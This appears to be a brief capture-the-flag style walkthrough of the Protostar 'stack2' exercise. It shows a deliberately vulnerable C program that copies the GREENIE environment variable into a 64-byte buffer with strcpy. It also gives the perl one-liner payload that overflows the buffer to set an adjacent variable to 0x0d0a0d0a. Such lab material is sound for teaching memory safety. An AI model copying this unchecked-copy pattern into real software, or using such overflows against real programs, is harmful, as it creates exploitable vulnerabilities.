This challenge is pretty much the same as the previous challenge, except that the buffer comes from an environmental variable.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
 volatile int modified;
 char buffer[64];
 char *variable;

 variable = getenv("GREENIE");

 if(variable == NULL) {
  errx(1, "please set the GREENIE environment variable\n");
 }

 modified = 0;

 strcpy(buffer, variable);

 if(modified == 0x0d0a0d0a) {
  printf("you have correctly modified the variable\n");
 } else {
  printf("Try again, you got 0x%08x\n", modified);
 }

}

This problem can simply be solved by running these commands:

user@protostar:/opt/protostar/bin$ GREENIE=`perl -e 'print "A"x64 . "\x0a\x0d\x0a\x0d"'`
user@protostar:/opt/protostar/bin$ export GREENIE
user@protostar:/opt/protostar/bin$ ./stack2
you have correctly modified the variable

This will put the 64 “A”s and 0x0d0a0d0a (in little endian) into an environmental variable. Then when the vulnerable C app reads it, overflows the buffer into the “modified” variable, just like the others.